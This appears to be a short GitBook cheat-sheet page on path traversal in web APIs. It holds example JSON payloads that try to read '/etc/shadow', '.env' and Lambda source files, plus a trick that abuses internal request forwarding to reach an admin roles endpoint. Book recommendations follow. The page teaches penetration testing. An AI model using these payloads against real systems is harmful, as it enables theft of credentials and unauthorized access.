Path Traversal

Path Traversal in Modern API

File Inclusion LFI / RFI

In APIs, traversal is common inside JSON parameters:

POST/api/export

{
"filename":"../../../etc/shadow"
}

POST/api/v2/preview-document

{
"templatePath":"../../../../../var/task/index.js"
}

AWS Lambda

{
"exportFile":"../../../../.env"
}

Internal path traversal via internal API forwarding

{
"user_id":"456",
"username":"poc"
}

{
"user_id":"../../admin/roles",
"username":"poc"
}

The server forward the request to:

POST /api/v1/users/../../admin/roles

Resources

Beyond dot dot slash: a practical guide to path traversal and arbitrary file read attacks – a practical guide to path traversal and arbitrary file read attacksYesWeHack

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• Hacking APIs: Breaking Web Application Programming Interfaces A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.

• Black Hat GraphQL: Attacking Next Generation APIs This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.